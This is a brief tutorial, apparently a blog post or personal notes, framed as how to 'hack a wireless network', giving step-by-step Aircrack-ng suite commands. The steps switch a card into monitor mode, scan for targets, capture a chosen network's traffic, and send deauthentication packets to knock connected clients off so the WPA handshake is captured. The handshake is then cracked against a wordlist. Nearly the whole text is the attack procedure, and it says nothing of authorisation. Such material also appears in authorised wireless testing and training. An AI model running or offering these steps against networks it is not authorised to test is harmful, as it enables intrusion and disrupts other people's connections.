To hack a wireless network, you need a wireless card with two features:
- Make sure your card supports monitor mode/promiscuous mode.
- Make sure you card is capable of performing packet injection.
Tool : Aircrack-ng
- Checking Wifi Card is on Monitor Mode or Mangement Mode.
# iwconfig
- It Converting Manage mode to Monitor Mode
# airmon-ng start wlan0 / wlan0mon
- Killing Current PID's
# kill PIDnumber [Pid No.]
- Scanning Nearby wifi network and return BSSID If Someone's is Connected to the wifi.
# airodump-ng wlan0mon / wlan0
- If Someone Connected to our Target wifi then Capturing their BSSID.
# airodump-ng -c [channel no] --bssid [wifi bssid] -w [save folder location] wlan0mon
- Disconnect the network and connect again and in that we capture handshake file.
# aireplay-ng --deauth 5 -a [attacker bssid no] -c [victim bssid no] wlan0mon
- We back to convert Monitor Mode to Manage Mode.
# airmon-ng stop wlan0
- Restarting the Network.
# service NetworkManager restart
- We Provided the wordlist and cap file and aircrack-ng cracking password.
# aircrack-ng -w [wordlist path] [cap file path]